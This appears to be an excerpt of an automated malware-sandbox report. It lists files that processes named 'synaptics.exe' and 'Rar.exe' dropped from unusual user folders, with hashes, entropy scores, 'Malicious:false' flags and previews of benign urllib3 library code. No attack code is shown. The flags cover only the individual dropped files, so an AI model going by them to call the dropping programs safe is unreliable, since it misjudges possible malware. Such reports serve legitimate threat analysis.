                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):12458
                                                                                                                                                                                      Entropy (8bit):5.650762055607489
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:384:pjDb/AE642qEOM00ueLG0d1JK9CZdFyKZA2MlJC9M7:BBpEfBbLPfyKZmbC+7
                                                                                                                                                                                      MD5:F81440DDB369A5B5F6CCA2294FAAE447
                                                                                                                                                                                      SHA1:1A90D65315AB6672854EDB3B8EE992F64AD0B91B
                                                                                                                                                                                      SHA-256:5CD4D75F9A944720A33264EBBBCB02B0927B68D07449F9D520692613A1A0FB73
                                                                                                                                                                                      SHA-512:521D91E50F78A6300467D2165CA99BBA2EBA393F8ABFED552BADE2AA9202D57B2986A24612FF95DBA2BFCA466E63CABD60A271125D8D19688C9E18726A73AD7D
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o.......=..f&K.......................@...s....U.d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z...d.Z.d.Z.d.Z.d.Z.d.g.Z.e.j.e.e.e.e.e.f...Z.d.d...d.D...Z.dcd.d...Z.ddd.d...Z.e.j.r~d.d.l.m.Z...d.d.l.m Z ..d.d.l!m.Z"..G.d.d ..d e d.d!..Z#i.Z$d"e%d#<.z_d.d.l.Z.d.d$l.m&Z&m.Z.m'Z'm(Z(m)Z)m*Z*m+Z+m,Z,m-Z-m.Z.m.Z.m/Z/..e+Z0e.r.e.e)e*e.j1j2e.j3e.j1j2d%k.r.e.j4n.d...s.d.Z.d&D.].Z5z.e6e/e5..e$e6e.d'e5......<.W.q...e7y.......Y.q.w.d.d.l!m.Z...W.n...e8y.......d(Z'd)Z(d*Z-d+Z.d...Z0Z+d,Z,Y.n.w.e.j9d e:d.f...Z;ded1d2..Z<dfd6d7..Z=dgd8d9..Z>............dhdidCdD..Z?e.j@.E.E.E.E.E.E.E.E.E.E.E.EdjdkdUdV....ZAe.j@.E.E.E.E.E.E.E.E.E.E.E.EdjdldXdV....ZA........................dmdldYdV..ZAdnd\d]..ZBdod_d`..ZC..dpdqdadb..ZDd.S.)r.....)...annotationsN)...unhexlify.....)...ProxySchemeUnsupported..SSLError.....)..._BRACELESS_IPV6_ADDRZ_RE.._IPV4_REFz.http/1.1c....................C...s....i.|.].\.}.}.|.t.t.|.d.....q.S...N)...getattr..hashlib)....0..le
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):3702
                                                                                                                                                                                      Entropy (8bit):5.71592384052882
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:hY/R/mUkAMdqu1vkAlH2TIYxfyRGH0MYUFgAL8IzE+wqq3:hXPA2MAV07xjHTgh2Etqq3
                                                                                                                                                                                      MD5:9D6D184381D65DD413843F71E9B59F78
                                                                                                                                                                                      SHA1:D02983E5BCA7BCA7877F26913C284DD6B09C2B07
                                                                                                                                                                                      SHA-256:9B8070B2987FD29A77A68267A62FB61BB146AA260F30F07554CC8BB182BBDFC3
                                                                                                                                                                                      SHA-512:04DE584F171B5FB89E35DF22AE5B8447CAAA194FEF2301AAAD679CB3701CF665E3B4FE1A22FF42B3FF3CAA033E6AEE86457B52CF03E10E09E503F8A21FB0F3CA
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o.......=..f.........................@...s....d.Z.d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z...e.j.r%d.d.l.m.Z...d.Z.G.d.d...d.e...Z...d!d"d.d...Z.d#d.d...Z...d$d%d.d ..Z.d.S.)&zHThe match_hostname() function from Python 3.5, essential when using SSL......)...annotationsN)...IPv4Address..IPv6Address.....)..._TYPE_PEER_CERT_RET_DICTz.3.5.0.1c....................@...s....e.Z.d.Z.d.S.)...CertificateErrorN)...__name__..__module__..__qualname__..r....r.....QC:\Users\Public\QExvbmVOb25l\lib\site-packages\urllib3\util\ssl_match_hostname.pyr........s........r......dn..typing.Any..hostname..str..max_wildcards..int..return..typing.Match[str] | None | boolc....................C...s....g.}.|.s.d.S.|...d...}.|.d...}.|.d.d.....}.|...d...}.|.|.k.r&t.d.t.|.........|.s2t.|.....|.....k...S.|.d.k.r<|...d.....n.|...d...sF|...d...rO|...t...|.......n.|...t...|.....d.d.......|.D.].}.|...t...|.......q]t...d.d...|.....d...t.j...}.|...|...S.).zhMatching according to RFC 6125, section 6.4.3.. http://to
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):9418
                                                                                                                                                                                      Entropy (8bit):5.267188456300155
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:P330cuKX0gSvpkv9nfgC+JI/XdABK1sdIDv5YaBbcMhu:P330lK/Svp4hXdcYsyxBYWu
                                                                                                                                                                                      MD5:245AD02E3CC1AC0972BF2A46C0C44171
                                                                                                                                                                                      SHA1:1B411627F23A2EBF45D666F4B4F0B49EC01AA5BB
                                                                                                                                                                                      SHA-256:DFF9C0FE4DCA8218C6354A0DD0869DD7EE4EA7BEBE8893508FFB00153E1ABF92
                                                                                                                                                                                      SHA-512:DDCE920C2BC55A009128DC1EBEC1DAE396D14A8A9701F74B7ACFDBCCD759E131DD69714E3ED84C616A4F018C571A2A7382F7D27A90972C0FBBFDC18765717ED3
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o.......=..f.".......................@...s....d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...e.j.r-d.d.l.m.Z...d.d.l.m.Z.m.Z...e.j.e.e.f...Z.e...d...Z.d.Z.G.d.d...d...Z.d.S.)......)...annotationsN.....)...ProxySchemeUnsupported)...Self.....)..._TYPE_PEER_CERT_RET.._TYPE_PEER_CERT_RET_DICT.._ReturnValuei.@..c....................@...s....e.Z.d.Z.d.Z.e.dsd.d.....Z.....dtdud.d...Z.dvd.d...Z.dwd.d...Z.dxd.d...Z.dydzd!d"..Z.d{d|d&d'..Z....#d}d~d,d-..Z.d.d.d0d1..Z.d.d.d2d3..Z...d.d.d.d.d4..d.d<d=..Z.d.d>d?..Z.d.d@dA..Z.e.j..Bd.d.dFdG....Z.e.j.d.dJdG....Z.d.d.dMdG..Z.d.dNdO..Z.d.dQdR..Z.d.dSdT..Z.d.dVdW..Z.d.dXdY..Z.d.d\d]..Z.d.d^d_..Z.d.d`da..Z.d.d.dcdd..Z.e.j.d.dgdh....Z.e.j.d.dkdh....Z.e.j.d.dndh....Z.....d.d.drdh..Z.d.S.)...SSLTransportaL.... The SSLTransport wraps an existing socket and establishes an SSL connection... Contrary to Python's implementation of SSLSocket, it allows you to chain. multiple TLS connections together. It's particularly useful if you need to. i
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):9598
                                                                                                                                                                                      Entropy (8bit):5.132660416158546
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:H08vOMrflhdz+7V0MV8K7byybXiCDzQyFF/LCfAChn8l/qxzWOBGawWy8I81GZ5e:Hdrn+l/ucy80CBXPqGrpjMKfQHcsyJO
                                                                                                                                                                                      MD5:0AE4CFBA3DB9B3E692E3248BA15A5323
                                                                                                                                                                                      SHA1:B37EC4DAA319581E8F5D30B9B346438775585031
                                                                                                                                                                                      SHA-256:251B2E1A71158B5F566C195FC2E1EC8D938D2790A363979D3F4456E406E61889
                                                                                                                                                                                      SHA-512:4A925AA9FF6387B57EA65E0E7E672CFBE0FDBC9B734766DCF43D191E13418AE77753B772D72A6208089C36FF4240C5A803F2CEC9CC74F70DCCA28F6CC6AEA7CF
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o.......=..fj(.......................@...s....U.d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...e.j.r*d.d.l.m.Z...G.d.d...d.e...Z.e.j.Z.d.e.d.<.e.j.e.j.e.e.f.....Z.G.d.d...d...Z.d.S.)......)...annotationsN)...Enum)...getdefaulttimeout.....)...TimeoutStateError)...Finalc....................@...s....e.Z.d.Z.d.Z.d.S.)..._TYPE_DEFAULT.....N)...__name__..__module__..__qualname__..token..r....r.....FC:\Users\Public\QExvbmVOb25l\lib\site-packages\urllib3\util\timeout.pyr........s........r....z.Final[_TYPE_DEFAULT].._DEFAULT_TIMEOUTc....................@...s....e.Z.d.Z.U.d.Z.e.Z.d.e.d.<.d.e.e.f.d$d.d...Z.d%d.d...Z.e.Z.e.d&d.d.....Z.e.d'd.d.....Z.e.d(d.d.....Z.d)d.d...Z.d*d.d...Z.d*d.d...Z.e.d+d d!....Z.e.d,d"d#....Z.d.S.)-..Timeouta....Timeout configuration... Timeouts can be defined as a default for a pool:.. .. code-block:: python.. import urllib3.. timeout = urllib3.util.Timeout(connect=2.0, read=7.0).. http = urllib3.PoolManager(timeout=timeout)..
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):11236
                                                                                                                                                                                      Entropy (8bit):5.783864614134648
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:JVOJJgt54ZqlH/qh/QFYP0YU5HqDtR4qzFYqW1D5hOBdmpInwqH5qVcPoO8RqUvi:JVeJgt54ZqVqhoJxHqDtR4qxYqW1D5k3
                                                                                                                                                                                      MD5:6823E15C6C2104B4317C44BA912CA4AE
                                                                                                                                                                                      SHA1:2CDC4612EEB65FF54C938A0516041128C48E0F07
                                                                                                                                                                                      SHA-256:6B2478317624B203689A6BA99F91BB4FB187BB5ECF6FA65150EE0FF8E8E47C2E
                                                                                                                                                                                      SHA-512:D950694ADFF1231D3EF318B03480AA1A79619103FD7C5E642771B9084B922558549C4EBCD81E0EF6348BEF6DB803048D7CEB033B3ED538E9B8F177B694E69009
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o.......=..fm;.......................@...s~...d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.Z.e...d...Z.e...d...Z.e...d.e.j.e.j.B...Z.d.Z.d.Z.d.j.e.e.d...Z.e.e.d...Z.g.d...Z.d.Z.d.d...d.d...e.D.......d...Z.d.e...d...Z.d.e...d...e...d...Z.d.Z.e...d...Z.e...d.e...d.....Z.e...d.e...d.....Z.e...d.e...d.....Z.e...d.e.d.d.......d.....Z.e...d e...d!....Z d"e.e.e.f...Z!e...e!e.j.e.j.B...Z"e#d#..Z$e#d$..Z%e$e%B.d%h.B.Z&e&d&d'h.B.Z'e'd(h.B...Z(Z)G.d)d*..d*e..*d*d+e.j+e,..f.d,e.j+e,..f.d-e.j+e,..f.d.e.j+e-..f.d/e.j+e,..f.d0e.j+e,..f.d1e.j+e,..f.g.....Z.e.j/dMd7d8....Z0e.j/dNd:d8....Z0dOd<d8..Z0dPd=d>..Z1e.j/dQd?d@....Z2e.j/dRdAd@....Z2dSdBd@..Z2dTdEdF..Z3dUdHdI..Z4dVdKdL..Z5d.S.)W.....)...annotationsN.....)...LocationParseError.....)...to_str)...http..httpsNz.%[a-fA-F0-9]{2}z.^(?:[a-zA-Z][a-zA-Z0-9+-]*:|/)zS^(?:([a-zA-Z][a-zA-Z0-9+.-]*):)?(?://([^\\/?#]*))?([^?#]*)(?:\?([^#]*))?(?:#(.*))?$z.(?:[0-9]{1,3}\.){3}[0-9]{1,3}z.[0-9A-Fa-f]{1,4}z.(?:{hex}:{hex}|{ipv4}))...hexZ.ipv4).r....Z.ls32).
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):1207
                                                                                                                                                                                      Entropy (8bit):5.053169822129588
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:24:Su2LkVMQdXRjkhlcRMHyz4tMXSwgpsqnud9Qzm+6IErGXTSu:S0MQdBYhlchWp1KQ9+GXmu
                                                                                                                                                                                      MD5:9365154AD6F626F4381CFC598D9EFBDB
                                                                                                                                                                                      SHA1:D5AA8F2CF7B527905900E926F3B2C1F8B3F8EA9B
                                                                                                                                                                                      SHA-256:17C26430C03F09005F9B412FCA37714D9CFA8B705B6E1333C5FD5A6AFBD843DA
                                                                                                                                                                                      SHA-512:192454D83C886EA33E2C43D81D49C7B5F6FF537C4E395C6747748897D0D0AB98FEF4FA8343058FABB0137047814FF27FAAB96F7EBA3372600B0C55EB5922B3FF
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o.......=..fz........................@...sN...d.d.l.m.Z...d.d.l.Z.d.d.l.m.Z.....d.d.d.d...Z...d.d.d.d...Z...d.d.d.d...Z.d.S.)......)...annotationsN)...TracebackType..x..str | bytes..encoding..str | None..errors..return..bytesc....................C....R...t.|.t...r.|.S.t.|.t...s.t.d.t.|...j.........|.s.|.r%|.j.|.p.d.|.p"d.d...S.|.....S...Nz.not expecting type z.utf-8..strict).r....)...isinstancer......str..TypeError..type..__name__..encode..r....r....r......r.....CC:\Users\Public\QExvbmVOb25l\lib\site-packages\urllib3\util\util.py..to_bytes.......................r....r....c....................C...r....r....).r....r....r....r....r....r......decoder....r....r....r......to_str....r....r......tp..type[BaseException] | None..value..BaseException..tb..TracebackType | None..typing.NoReturnc....................C...s$...z.|.j.|.u.r.|...|.....|...d.}.d.}.w...N)...__traceback__..with_traceback).r....r....r....r....r....r......reraise....s................r%...).NN).r....r....r....r....r....r....r..
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):2386
                                                                                                                                                                                      Entropy (8bit):5.152838774685659
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:48:3y6A4HN1SSpUlQYvX7ws85K4CE8uG9G0N3Ae8wWv9O3ArDiPh:3y6A4HT1pMvX7h0mh9GcAFwWlIArDiPh
                                                                                                                                                                                      MD5:CCC0DA8D59E9CD01540D64AA55F301D2
                                                                                                                                                                                      SHA1:A511DB83382D48750970B07BFDB1362CD7ED9EF1
                                                                                                                                                                                      SHA-256:4E103663D9FF581E17A89FEC67A9F8A4661C05E04BA131329E0B19EE48F1E8F1
                                                                                                                                                                                      SHA-512:47CB7CA3BA3D11E5632FDA972BBCBA39794E7B278569A6FB66207BFBFB5A4064ED0B2ACD74D4DFFC626CA1BD1949CCCFBA46D6045566A571B1B4BD5E1150FD82
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o.......=..fG........................@...s....d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.g.Z.......d.d.d.d...Z.......d.d.d.d...Z.d.d.d...Z.......d.d.d.d...a.d.d.d.d...Z.d.d.d.d...Z.d.S.)......)...annotationsN)...partial..wait_for_read..wait_for_writeF..sock..socket.socket..read..bool..write..timeout..float | None..returnc....................C...sb...|.s.|.s.t.d.....g.}.g.}.|.r.|...|.....|.r.|...|.....t.t.j.|.|.|...}.|.|...\.}.}.}.t.|.p/|.p/|...S.).N.2must specify at least one of read=True, write=True)...RuntimeError..appendr......selectr....).r....r....r....r....Z.rcheckZ.wcheck..fnZ.rreadyZ.wreadyZ.xready..r.....CC:\Users\Public\QExvbmVOb25l\lib\site-packages\urllib3\util\wait.py..select_wait_for_socket!...s..........................r....c........................s^...|.s.|.s.t.d.....d.}.|.r.|.t.j.O.}.|.r.|.t.j.O.}.t...........|.|.....d...f.d.d...}.t.|.|.....S.).Nr....r......tr....r......list[tuple[int, int]]c........................s....|.d.u.r.|.d.9.}.....|...S.).Ni....)...poll).r..
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script text executable Python script, ASCII text executable
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):4458
                                                                                                                                                                                      Entropy (8bit):4.691042019913651
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:Uq30QyT1QdMw0PwwStdwcWTyFIPCjuRIi84omvLBoQ/nQo:Uqfyi6c6omvp/Qo
                                                                                                                                                                                      MD5:EB8C202F6EE2C1F04C1CC1C6B74D3973
                                                                                                                                                                                      SHA1:24D78D86DC4C3C1F9363EB9AF5725314FC42667A
                                                                                                                                                                                      SHA-256:D28EFDFB935B45FA410F2A1E8463CB982039E38B024A25EFC74985F71CB7186D
                                                                                                                                                                                      SHA-512:97E5C41588B0D31AF62772BD1EC883E252537B41AF8C745491E5197F43AA133408477826B58951EA91631B876DBB34A464C281ACA592303920ECA87125B6E383
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:from __future__ import annotations..import socket.import typing..from ..exceptions import LocationParseError.from .timeout import _DEFAULT_TIMEOUT, _TYPE_TIMEOUT.._TYPE_SOCKET_OPTIONS = typing.List[typing.Tuple[int, int, typing.Union[int, bytes]]]..if typing.TYPE_CHECKING:. from .._base_connection import BaseHTTPConnection...def is_connection_dropped(conn: BaseHTTPConnection) -> bool: # Platform-specific. """. Returns True if the connection is dropped and should be closed.. :param conn: :class:`urllib3.connection.HTTPConnection` object.. """. return not conn.is_connected...# This function is copied from socket.py in the Python 2.7 standard.# library test suite. Added to its signature is only `socket_options`..# One additional modification is that we avoid binding to IPv6 servers.# discovered in DNS if the system doesn't have IPv6 functionality..def create_connection(. address: tuple[str, int],. timeout: _TYPE_TIMEOUT = _DEFAULT_TIMEOUT,. source_address: tupl
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):1148
                                                                                                                                                                                      Entropy (8bit):4.568988072838994
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:24:1R7i0ekLILn8+WQXvAFnT8adOeeleCfdO2MG89dYTysSd2o:PIgILn8+W38awee8CfdO2MG89dWysSdF
                                                                                                                                                                                      MD5:9BD4BCA24A0FA10D896D386B7D736697
                                                                                                                                                                                      SHA1:A10A3A580A9FEF94AF52CF37E00A9913E0F64DA0
                                                                                                                                                                                      SHA-256:B1E3FCF90E41E9B07474CB703E3F98719650DF4BC7B8BA91BBEB48D096767F3B
                                                                                                                                                                                      SHA-512:FECEE94612F30C3A5DEA846F6245BD4B5C717F9E65D6450C26DCD22B9DBF2CDD8B00C60FBA5143BC986A5CAEED22A4B64FA6CEDA5369CCF71A72861E9553E7C9
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:from __future__ import annotations..import typing..from .url import Url..if typing.TYPE_CHECKING:. from ..connection import ProxyConfig...def connection_requires_http_tunnel(. proxy_url: Url | None = None,. proxy_config: ProxyConfig | None = None,. destination_scheme: str | None = None,.) -> bool:. """. Returns True if the connection requires an HTTP CONNECT through the proxy... :param URL proxy_url:. URL of the proxy.. :param ProxyConfig proxy_config:. Proxy configuration from poolmanager.py. :param str destination_scheme:. The scheme of the destination. (i.e https, http, etc). """. # If we're not using a proxy, no way to use a tunnel.. if proxy_url is None:. return False.. # HTTP destinations never require tunneling, we always forward.. if destination_scheme == "http":. return False.. # Support for forwarding with HTTPS proxies and HTTPS destinations.. if (. proxy_url.scheme == "https". a
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):8064
                                                                                                                                                                                      Entropy (8bit):4.745558576767803
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:I9yg6hKFsmz/Q2P7fTqSzblmEvxcUA7W/EE6aLHMCtkEy20KzaV79KW:r/hKZz/P7bq6pmEXAiHXbqp5
                                                                                                                                                                                      MD5:C77F7D6FA029F06E949D277D7864A17A
                                                                                                                                                                                      SHA1:0459A2C46601226E176D89691A2EC83CC5D8ECE8
                                                                                                                                                                                      SHA-256:52B676837CB7B2D1A91FCAE6F92C7CFA896581E8A2288E3DE83657442C316FDA
                                                                                                                                                                                      SHA-512:13B4DFA3D5DA5932348CE5DF531110C897C568662CA26369ABE9B07C16E58E88FA49C45CD741EE2FD718E41F5A950CEDB9930A50912D58351C225FB2A10B3E35
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:from __future__ import annotations..import io.import typing.from base64 import b64encode.from enum import Enum..from ..exceptions import UnrewindableBodyError.from .util import to_bytes..if typing.TYPE_CHECKING:. from typing import Final..# Pass as a value within ``headers`` to skip.# emitting some HTTP headers that are added automatically..# The only headers that are supported are ``Accept-Encoding``,.# ``Host``, and ``User-Agent``..SKIP_HEADER = "@@@SKIP_HEADER@@@".SKIPPABLE_HEADERS = frozenset(["accept-encoding", "host", "user-agent"])..ACCEPT_ENCODING = "gzip,deflate".try:. try:. import brotlicffi as _unused_module_brotli # type: ignore[import-not-found] # noqa: F401. except ImportError:. import brotli as _unused_module_brotli # type: ignore[import-not-found] # noqa: F401.except ImportError:. pass.else:. ACCEPT_ENCODING += ",br".try:. import zstandard as _unused_module_zstd # noqa: F401.except ImportError:. pass.else:. ACCEPT_ENCODING += ",z
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):3374
                                                                                                                                                                                      Entropy (8bit):4.616514316314554
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:48:Pn2y1uZsY0Gb9PpvNY4zamL7gkLgUCj0ZDkB7ST0FFaAHt5JhKCUAR6Px6nZwHec:+CuF0sPpvz+b5w8Ff/JOC6PIHc
                                                                                                                                                                                      MD5:B4AB7140164239E3CAA07E0D2672326F
                                                                                                                                                                                      SHA1:F296CB85D9DF58E5F40F560C9DAE60DB5AF70961
                                                                                                                                                                                      SHA-256:BD013ADFDBA81218F5BE98C4771BB994D22124249466477BA6A965508D0164E0
                                                                                                                                                                                      SHA-512:4750FADBD852F723AF3A01006EF1A87B0F4D53264E2077F05DF1D99CBC965D6EBFAC0028BBB18916A4A4931E72DCAAB6A066762055996AD8CBE36EBF0DDA0D08
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:from __future__ import annotations..import http.client as httplib.from email.errors import MultipartInvariantViolationDefect, StartBoundaryNotFoundDefect..from ..exceptions import HeaderParsingError...def is_fp_closed(obj: object) -> bool:. """. Checks whether a given file-like object is closed... :param obj:. The file-like object to check.. """.. try:. # Check `isclosed()` first, in case Python3 doesn't set `closed`.. # GH Issue #928. return obj.isclosed() # type: ignore[no-any-return, attr-defined]. except AttributeError:. pass.. try:. # Check via the official file-like-object way.. return obj.closed # type: ignore[no-any-return, attr-defined]. except AttributeError:. pass.. try:. # Check if the object is a container for another file-like object that. # gets released on exhaustion (e.g. HTTPResponse).. return obj.fp is None # type: ignore[attr-defined]. except AttributeError:
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):18459
                                                                                                                                                                                      Entropy (8bit):4.430321061770966
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:WBMf12FuuccXjtRLJIkyMT9hFP0POAFuMqaWJef2Z0t5CpPu2wFsWrdLOGdUhoR8:WXsuPVnpXA5CcOaUT
                                                                                                                                                                                      MD5:3E8C2638CEB2BCF5173627AE24C6324D
                                                                                                                                                                                      SHA1:C718DEC62FEDD1780FBDE1B9F6C96B4460A5383F
                                                                                                                                                                                      SHA-256:6E3FB6614A9B9712E5BFC4C78397F1C30F83339E1709B8E0657210EF55E2A026
                                                                                                                                                                                      SHA-512:5E394519BC0E03868D2AD098BD70E6F8847D8E7716F9FE1808AC171C550043F8E67EE21A5FF4AFA4F343435F5E5D11C22FCBCE465E2D14A430882870E5394B6E
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:from __future__ import annotations..import email.import logging.import random.import re.import time.import typing.from itertools import takewhile.from types import TracebackType..from ..exceptions import (. ConnectTimeoutError,. InvalidHeader,. MaxRetryError,. ProtocolError,. ProxyError,. ReadTimeoutError,. ResponseError,.).from .util import reraise..if typing.TYPE_CHECKING:. from typing_extensions import Self.. from ..connectionpool import ConnectionPool. from ..response import BaseHTTPResponse..log = logging.getLogger(__name__)...# Data structure for representing the metadata of requests that result in a retry..class RequestHistory(typing.NamedTuple):. method: str | None. url: str | None. error: Exception | None. status: int | None. redirect_location: str | None...class Retry:. """Retry configuration... Each retry attempt will create a new Retry object with updated values, so. they can be safely reused... Retries can be defined
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):19238
                                                                                                                                                                                      Entropy (8bit):4.878450596452805
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:384:3SsP+N8GFe6jhepukwg242k1xnaLaQ7pfpyA7y+MwobAQ7pfpyA7y+MwobtymDIc:3SAqgZ1xwpfpyA7y+Mwo0qpfpyA7y+MT
                                                                                                                                                                                      MD5:315406A6A4D48F43D3DDA930E408DCDE
                                                                                                                                                                                      SHA1:A41345D8FDF9312F6BCE9B0BB66478C7841E2E69
                                                                                                                                                                                      SHA-256:58DF1AE8A3CF72FBA46D9D0C5250403A41A297C6D8298F0DA0860EC3B41E38B2
                                                                                                                                                                                      SHA-512:4E497BF9687658397AFAD745E0AB94AEA8199451FACDD6C8BB85725D5819EDEC6B807F3DF4E7D2AC42D24B8921FFACA2623E28B142BED61658B02D30968ECC4D
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:from __future__ import annotations..import hashlib.import hmac.import os.import socket.import sys.import typing.import warnings.from binascii import unhexlify..from ..exceptions import ProxySchemeUnsupported, SSLError.from .url import _BRACELESS_IPV6_ADDRZ_RE, _IPV4_RE..SSLContext = None.SSLTransport = None.HAS_NEVER_CHECK_COMMON_NAME = False.IS_PYOPENSSL = False.ALPN_PROTOCOLS = ["http/1.1"].._TYPE_VERSION_INFO = typing.Tuple[int, int, int, str, int]..# Maps the length of a digest to a possible hash function producing this digest.HASHFUNC_MAP = {. length: getattr(hashlib, algorithm, None). for length, algorithm in ((32, "md5"), (40, "sha1"), (64, "sha256")).}...def _is_bpo_43522_fixed(. implementation_name: str,. version_info: _TYPE_VERSION_INFO,. pypy_version_info: _TYPE_VERSION_INFO | None,.) -> bool:. """Return True for CPython 3.8.9+, 3.9.3+ or 3.10+ and PyPy 7.3.8+ where. setting SSLContext.hostname_checks_common_name to False works... Outside of CPython a
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):5812
                                                                                                                                                                                      Entropy (8bit):4.693270482744315
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:qnswp1bMzfocVZn0QkWlQ2VrzjthGH5t+6Q5JZolPVJIpdmfNtSupXeqdWL:uR/bmXB0QkWqitUHFgZMIPmVgu4r
                                                                                                                                                                                      MD5:AA846D5E039C6A30B7F7C3B684CAE3E7
                                                                                                                                                                                      SHA1:9BD94E0DDD8ABF77F0A719D11A00836978C8F5B8
                                                                                                                                                                                      SHA-256:81A5AA8B1A18B50FC628EF1F7111858F755778CA2ACB1410B944CF8167A22FF3
                                                                                                                                                                                      SHA-512:DE8ACBBC98797D455A47C6F136F6415F36846F6CD8F09591407690BD673566DC483447FFE8DD125D6AD99A7B3C0137F3A3C31406E665597B0C86A04436F84408
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
